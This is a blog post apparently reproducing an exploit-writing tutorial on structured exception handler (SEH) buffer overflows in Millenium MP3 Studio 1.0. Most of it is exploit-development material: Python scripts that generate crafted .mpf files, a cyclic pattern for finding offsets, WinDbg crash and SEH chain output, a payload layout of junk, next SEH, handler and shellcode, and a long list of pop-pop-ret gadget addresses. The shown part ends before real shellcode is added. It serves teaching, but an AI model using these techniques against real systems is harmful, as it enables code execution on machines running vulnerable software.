Knownleage Fun: June 2015

Wednesday, June 10, 2015

Exploit writing tutorial part 3b : SEH Based Exploits – just another example

exploit-004

In the previous tutorial post, I have explained the basics of SEH based exploits. I have mentioned that in the most simple case of an SEH based exploit, the payload is structured like this :

[Junk][next SEH][SEH][Shellcode]

I have indicated that SEH needs to be overwritten by a pointer to “pop pop ret” and that next SEH needs to be overwritten with 6 bytes to jump over SEH… Of course, this structure was based on the logic of most SEH based vulnerabilities, and more specifically on the vulnerability in Easy RM to MP3 Player. So it’s just an example behind the concept of SEH based vulnerabilities. You really need to look to all registers, work with breakpoints, etc, to see where your payload / shellcode resides… look at your stack and then build the payload structure accordingly… Just be creative.

Sometimes you get lucky and the payload can be built almost blindfolded. Sometimes you don’t get lucky, but you can still turn a somewhat hard to exploit vulnerability into a stable exploit that works across various versions of the operating system. And sometimes you will need to hardcode addresses because that is the only way to make things work. Either way, most exploits don’t look the same. They are manual and handcrafted work, based on the specific properties of a given vulnerability and the available methods to exploit the vulnerability.

In today’s tutorial, we’ll look at building an exploit for a vulnerability that was discovered in Millenium MP3 Studio 1.0, You can download a local copy of Millenium MP3 Studio here.

The proof of concept script states that (probably based on the values of the registers), it’s easy to exploit… but it did not seem to work for the person who discovered the flaw and posted this PoC script.

Based on the values in the registers displayed by “Hack4love”, one could conclude that this is a typical stack based overflow, where EIP gets overwritten with the junk buffer… so you need to find the offset to EIP, find the payload in one of the registers, overwrite EIP with a “jump to…” and that’s it ? Well… not exactly.

Let’ see. Create a file with “http://”+5000 A’s… What do you get when you run the application via windbg and open the file ? We’ll create a mpf file :

#!/usr/bin/env python
# -*- coding: utf8 -*-

fpath = "c0d3r.mpf"
junk = "http://%s" % ("A" * 5000)

print "[+] Writing exploit file %s" % fpath
with open(fpath, "w") as f:
    f.write(junk)

print "[+] File written\n"

Create file c0d3r.npf. Open windbg and open the mp3studio executable. Run the application and open the file. (I’m not going to repeat these instructions every time, I assume you know the drill by now)

(fec.688): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0012fba4 ebx=0012fba4 ecx=00000000 edx=41414141 esi=0012eb7c edi=00fabf98
eip=00403734 esp=0012eb68 ebp=0012fbac iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for image00400000
image00400000+0x3734:
00403734 8b4af8          mov     ecx,dword ptr [edx-8] ds:0023:41414139=????????

Right, access violation… but the registers are nowhere near the ones mentioned in the PoC script. So either the buffer length is wrong (to trigger a typical stack based EIP overwrite overflow), or it’s a SEH based issue. Look at the SEH Chain to find out :

0:000> !exchain
0012fb8c: 41414141
Invalid exception stack at 41414141

ah, ok. Both the SE Handler and the next SEH are overwritten. So it’s a SEH based exploit.

Build another file with a 5000 character Metasploit pattern in order to find the offset to next SEH and SE Handler :

#!/usr/bin/env python
# -*- coding: utf8 -*-

fpath = "c0d3r.mpf"
junk = "http://Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk"

print "[+] Writing exploit file %s" % fpath
with open(fpath, "w") as f:
    f.write(junk)

print "[+] File written\n"

Now SEH chain looks like this :

(894.ba0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0012fba4 ebx=0012fba4 ecx=00000000 edx=68463668 esi=0012eb7c edi=00fabf98
eip=00403734 esp=0012eb68 ebp=0012fbac iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for image00400000
image00400000+0x3734:
00403734 8b4af8          mov     ecx,dword ptr [edx-8] ds:0023:68463660=????????
0:000> !exchain
0012fb8c: 30684639
Invalid exception stack at 67463867

So SE Handler was overwritten with 0x39466830 (little endian, remember), and next SEH was overwritten with 0x67384667

SE Handler : 0x39466830 = 9Fh0 (pattern offset 4109)
next SEH : 0x67384667 = g8Fg (pattern offset 4105)

This makes sense. Now, in a typical SEH exploit, you would build your payload like this :

first 4105 junk characters (and get rid of some nasty characters such as the 2 backslashes after http: + added a couple of A’s to keep the amount of characters in groups of 4)
then overwrite next SEH with jumpcode (0xeb,0x06,0x90,0x90) to jump over SE Handler and land on the shellcode
then overwrite SE Handler with a pointer to pop pop ret
then put your shellcode (surrounded by nops if necessary) and append more data if required

or, in perl (still using some fake content just to verify the offsets) :

#!/usr/bin/env python
# -*- coding: utf8 -*-

totalsize = 5005
fpath = "c0d3r.mpf"
junk = "http:AA%s" % ("A" * 4105)
nseh = "BBBB"
seh = "CCCC"

buf1 = "%s%s%s" % (junk, nseh, seh)

shellcode = "D" * (totalsize - len(buf1))
payload = "%s%s" % (buf1, shellcode)

print "[+] Writing exploit file %s" % fpath
with open(fpath, "w") as f:
    f.write(payload)

print "[+] File written\n"

Crash:

(768.c0c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0012fba4 ebx=0012fba4 ecx=00000000 edx=44444444 esi=0012eb7c edi=00fabf98
eip=00403734 esp=0012eb68 ebp=0012fbac iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for image00400000
image00400000+0x3734:
00403734 8b4af8          mov     ecx,dword ptr [edx-8] ds:0023:4444443c=????????
0:000> !exchain
0012fb8c: 43434343
Invalid exception stack at 42424242

So SE Handler was overwritten with 43434343 (4 C’s, as expected), and next SEH was overwritten with 42424242 (4 B’s, as expected). Let’s replace the SE Handler with a pointer to pop pop ret, and replace next SEH with 4 breakpoints. (no jumpcode yet, we just want to find our payload) :

Look at the list of loaded modules and try to find a pop pop ret in one of the modules. (You can use the Ollydbg “SafeSEH” plugin to see whether the modules are compiled with safeSEH or not).

0x100011e0 pop ebp; pop ebx; ret
0x1000122b pop ebp; pop ebx; ret
0x10001292 pop ebp; pop ebx; ret
0x10001582 pop edi; pop esi; ret
0x10001615 pop esi; pop ebp; ret
0x10001c67 pop esi; pop ebx; ret
0x10001c86 pop esi; pop ebx; ret
0x10001c99 pop esi; pop ebx; ret
0x10002a10 pop esi; pop ebx; ret
0x10002a19 pop esi; pop ebx; ret
0x100032a6 pop edi; pop esi; retn 0x0004
0x10003434 pop esi; pop edi; retn 0x0014
0x1000344b pop esi; pop edi; retn 0x0014
0x10003467 pop esi; pop edi; retn 0x0014
0x100034a5 pop esi; pop edi; retn 0x0014
0x100034dd pop esi; pop edi; retn 0x0014
0x100034f6 pop esi; pop edi; retn 0x0014
0x1000352c pop esi; pop edi; retn 0x0014
0x1000353c pop esi; pop edi; retn 0x0014
0x10003558 pop esi; pop edi; retn 0x0014
0x10003568 pop esi; pop edi; retn 0x0014
0x10003582 pop esi; pop edi; retn 0x0014
0x10003592 pop esi; pop edi; retn 0x0014
0x100035c0 pop esi; pop edi; retn 0x0014
0x100035d7 pop esi; pop edi; retn 0x0014
0x100035f0 pop esi; pop edi; retn 0x0014
0x10003600 pop esi; pop edi; retn 0x0014
0x1000361e pop esi; pop edi; retn 0x0014
0x1000362e pop esi; pop edi; retn 0x0014
0x1000365a pop esi; pop edi; retn 0x0014
0x10003694 pop esi; pop edi; retn 0x0014
0x100036d5 pop esi; pop edi; retn 0x0014
0x100036e5 pop esi; pop edi; retn 0x0014
0x100036f5 pop esi; pop edi; retn 0x0014
0x10003705 pop esi; pop edi; retn 0x0014
0x10003715 pop esi; pop edi; retn 0x0014
0x1000373d pop esi; pop edi; retn 0x0014
0x1000375f pop esi; pop edi; retn 0x0014
0x100037a1 pop esi; pop edi; retn 0x0014
0x1000398e pop ebp; pop ebx; ret
0x100039b1 pop ebp; pop ebx; ret
0x10003a82 pop esi; pop ebx; retn 0x0014
0x10003aa3 pop esi; pop ebx; retn 0x0014
0x10003ab1 pop esi; pop ebx; retn 0x0014
0x10003ad6 pop esi; pop ebx; retn 0x0014
0x10003af3 pop esi; pop ebx; retn 0x0014
0x10003b01 pop esi; pop ebx; retn 0x0014
0x10003b1e pop esi; pop ebx; retn 0x0014
0x10003b2b pop esi; pop ebx; retn 0x0014
0x10003b45 pop esi; pop ebx; retn 0x0014
0x10003b52 pop esi; pop ebx; retn 0x0014
0x10003b6b pop esi; pop ebx; retn 0x0014
0x10003b7a pop esi; pop ebx; retn 0x0014
0x10003b89 pop esi; pop ebx; retn 0x0014
0x10003ba1 pop esi; pop ebx; retn 0x0014
0x10003bae pop esi; pop ebx; retn 0x0014
0x10003bbb pop esi; pop ebx; retn 0x0014
0x10003bd0 pop esi; pop ebx; retn 0x0014
0x10003bef pop esi; pop ebx; retn 0x0014
0x10003bfc pop esi; pop ebx; retn 0x0014
0x10003c09 pop esi; pop ebx; retn 0x0014
0x10003c18 pop esi; pop ebx; retn 0x0014
0x10003c27 pop esi; pop ebx; retn 0x0014
0x10003c36 pop esi; pop ebx; retn 0x0014
0x10003c5e pop esi; pop ebx; retn 0x0014
0x10003c83 pop esi; pop ebx; retn 0x0014
0x10003cae pop esi; pop ebx; retn 0x0014
0x10003cd1 pop esi; pop ebx; retn 0x0014
0x10003cf2 pop esi; pop ebx; retn 0x0014
0x10003f09 pop ebp; pop ebx; ret
0x10003f50 pop ebp; pop ebx; ret
0x10003fa5 pop esi; pop ebx; ret
0x10003fe4 pop esi; pop ecx; retn 0x0008
0x10004010 pop esi; pop ecx; retn 0x0008
0x10004037 pop esi; pop ecx; retn 0x0008
0x1000403e pop esi; pop ecx; retn 0x0008
0x100043e0 pop edi; pop esi; retn 0x0004
0x10004499 pop edi; pop esi; retn 0x0008
0x100044cc pop edi; pop esi; retn 0x0008
0x1000451b pop edi; pop esi; retn 0x0008
0x10004561 pop esi; pop ebx; retn 0x0010
0x1000457d pop esi; pop ebx; retn 0x0010
0x100045cb pop esi; pop ebx; retn 0x0010
0x1000463c pop esi; pop ebx; ret
0x10004642 pop esi; pop ebx; ret
0x1000468c pop ebp; pop ebx; retn 0x000c
0x1000478e pop ebp; pop ebx; retn 0x000c
0x100047b0 pop ebp; pop ebx; retn 0x000c
0x100047c5 pop ebp; pop ebx; retn 0x000c
0x100048e6 pop ebp; pop ebx; retn 0x000c
0x10004977 pop ebp; pop ebx; retn 0x000c
0x100049f1 pop ebp; pop ebx; retn 0x000c
0x10004a1b pop ebp; pop ebx; retn 0x000c
0x10004adb pop edi; pop esi; retn 0x0004
0x10004b97 pop edi; pop esi; retn 0x0004
0x10004dd5 pop edi; pop esi; retn 0x0004
0x10005249 pop edi; pop esi; retn 0x0008
0x1000527c pop edi; pop esi; retn 0x0008
0x100052cd pop edi; pop esi; retn 0x0008
0x10005311 pop esi; pop ebx; retn 0x0010
0x1000532d pop esi; pop ebx; retn 0x0010
0x1000537b pop esi; pop ebx; retn 0x0010
0x100053ec pop esi; pop ebx; ret
0x100053f2 pop esi; pop ebx; ret
0x1000543c pop ebp; pop ebx; retn 0x000c
0x1000555a pop ebp; pop ebx; retn 0x000c
0x1000557c pop ebp; pop ebx; retn 0x000c
0x10005591 pop ebp; pop ebx; retn 0x000c
0x100056b6 pop ebp; pop ebx; retn 0x000c
0x1000574b pop ebp; pop ebx; retn 0x000c
0x100057c5 pop ebp; pop ebx; retn 0x000c
0x100057ef pop ebp; pop ebx; retn 0x000c
0x10005c46 pop esi; pop ebp; retn 0x0008
0x10005cd5 pop esi; pop ebp; retn 0x0008
0x10005d3b pop esi; pop ebp; retn 0x0008
0x10005ea5 pop ebp; pop ebx; retn 0x0008
0x10005eaf pop ebp; pop ebx; retn 0x0008
0x10006332 pop edi; pop esi; retn 0x0008
0x100063d5 pop esi; pop edi; ret
0x10006439 pop ebp; pop ebx; ret
0x100064b1 pop esi; pop ebx; retn 0x000c
0x100064c4 pop esi; pop ebx; retn 0x000c
0x100064f3 pop esi; pop ebx; retn 0x000c
0x100064fe pop esi; pop ebx; retn 0x000c
0x10006519 pop esi; pop ebx; retn 0x000c
0x10006550 pop esi; pop ebx; retn 0x000c
0x10006613 pop ebp; pop ebx; retn 0x000c
0x10006627 pop ebp; pop ebx; retn 0x000c
0x10006661 pop ebp; pop ebx; retn 0x000c
0x10006698 pop ebp; pop ebx; retn 0x000c
0x100066d3 pop ebp; pop ebx; retn 0x000c
0x100066f1 pop ebp; pop ebx; retn 0x000c
0x10006721 pop esi; pop ebx; retn 0x000c
0x10006734 pop esi; pop ebx; retn 0x000c
0x10006747 pop esi; pop ebx; retn 0x000c
0x10006760 pop esi; pop ebx; retn 0x000c
0x10006772 pop esi; pop ebx; retn 0x000c
0x1000679a pop esi; pop ebx; retn 0x000c
0x100067b3 pop ebp; pop ebx; retn 0x0014
0x100067c7 pop ebp; pop ebx; retn 0x0014
0x100067db pop ebp; pop ebx; retn 0x0014
0x100067f7 pop ebp; pop ebx; retn 0x0014
0x10006a92 pop esi; pop ebx; retn 0x0004
0x10007047 pop edi; pop esi; ret
0x10007092 pop edi; pop esi; ret
0x100070fb pop ebp; pop ebx; ret
0x1000713e pop ebp; pop ebx; ret
0x10007177 pop ebp; pop ebx; ret
0x100071cd pop edi; pop esi; ret
0x1000723b pop edi; pop esi; ret
0x1000726e pop edi; pop esi; ret
0x100072a1 pop edi; pop esi; ret
0x100072fd pop edi; pop esi; ret
0x10007302 pop edi; pop esi; ret
0x10007307 pop edi; pop esi; ret
0x1000749b pop esi; pop ebx; ret
0x100074dc pop esi; pop ebx; ret
0x10007514 pop esi; pop ebx; ret
0x1000757b pop ebp; pop ebx; ret
0x100075c5 pop ebp; pop ebx; ret
0x100075fe pop ebp; pop ebx; ret
0x100076f2 pop esi; pop ebx; ret
0x10007753 pop esi; pop ebx; ret
0x10007786 pop esi; pop ebx; ret
0x100079ff pop edi; pop esi; ret
0x10007ac8 pop ebp; pop ebx; ret
0x10007ad7 pop ebp; pop ebx; ret
0x10007af3 pop esi; pop ebx; retn 0x000c
0x10007b23 pop esi; pop ebx; retn 0x000c
0x10007b3d pop esi; pop ebx; retn 0x000c
0x10007cb2 pop edi; pop esi; ret
0x10007d14 pop edi; pop esi; ret
0x10007d87 pop edi; pop esi; ret
0x10007dc7 pop edi; pop esi; ret
0x10007dec pop edi; pop esi; ret
0x10007e0e pop edi; pop esi; ret
0x10007e31 pop edi; pop esi; ret
0x10007ed5 pop esi; pop ebx; ret
0x10007f01 pop esi; pop ebx; ret
0x10007f0a pop esi; pop ebx; ret
0x10007f3f pop esi; pop ebx; ret
0x1000862e pop edi; pop esi; ret
0x100086da pop edi; pop esi; ret
0x100089c1 pop edi; pop esi; ret
0x100089fe pop edi; pop esi; ret
0x10008a74 pop edi; pop esi; ret
0x10008aa5 pop edi; pop esi; ret
0x10008adf pop edi; pop esi; ret
0x10008b2b pop edi; pop esi; ret
0x10008b4a pop edi; pop esi; ret
0x10008b6d pop edi; pop esi; ret
0x10008b91 pop edi; pop esi; ret
0x10008bb0 pop edi; pop esi; ret
0x10008bc5 pop edi; pop esi; ret
0x10008e12 pop edi; pop esi; ret
0x10008efd pop esi; pop ebx; ret
0x10008f52 pop esi; pop ebx; ret
0x10008fe7 pop esi; pop ebx; ret
0x1000904e pop edi; pop esi; ret
0x10009145 pop ebp; pop ebx; ret
0x10009165 pop ebp; pop ebx; ret
0x1000917e pop ebp; pop ebx; ret
0x100091d5 pop ebp; pop ebx; ret
0x100091e8 pop ebp; pop ebx; ret
0x1000942a pop edi; pop esi; ret
0x10009459 pop edi; pop esi; ret
0x1000957d pop esi; pop ebx; ret
0x100095ce pop esi; pop ebx; ret
0x10009610 pop esi; pop ebx; ret
0x1000998a pop edi; pop esi; ret
0x100099b9 pop edi; pop esi; ret
0x1000a0c5 pop esi; pop ebx; ret
0x1000a13b pop ebp; pop ebx; ret
0x1000a25b pop ebp; pop ebx; ret
0x1000a26e pop ebp; pop ebx; ret
0x1000a2a6 pop ebp; pop ebx; ret
0x1000a59e pop edi; pop esi; ret
0x1000a5b5 pop edi; pop esi; ret
0x1000a604 pop edi; pop esi; ret
0x1000a63a pop edi; pop esi; ret
0x1000a70d pop ebp; pop ebx; ret
0x1000a747 pop ebp; pop ebx; ret
0x1000aa0d pop esi; pop ebx; ret
0x1000bb2b pop edi; pop esi; ret
0x1000bb6c pop esi; pop edi; ret
0x1000cc12 pop ebx; pop ecx; ret
0x1000cdc2 pop ebx; pop ecx; ret
0x1000cf84 pop edi; pop esi; ret
0x1000cfa4 pop edi; pop esi; ret
0x1000d00f pop edi; pop esi; ret
0x1000d32a pop ebx; pop esi; ret
0x1000d41e pop ebp; pop ebx; ret
0x1000d4d4 pop ebp; pop ebx; ret
0x1000d507 pop ebp; pop ebx; ret
0x1000d90a pop edi; pop ebx; ret
0x1000db7c pop esi; pop ebx; ret
0x1000dbac pop esi; pop ebx; ret
0x1000dc0e pop esi; pop ebx; ret
0x1000dc40 pop esi; pop ebx; ret
0x1000dcb1 pop esi; pop edi; ret
0x1000dd12 pop ebp; pop ebx; ret
0x1000dd8e pop ebp; pop ebx; ret
0x1000de22 pop ebp; pop ebx; ret
0x1000de9e pop ebp; pop ebx; ret
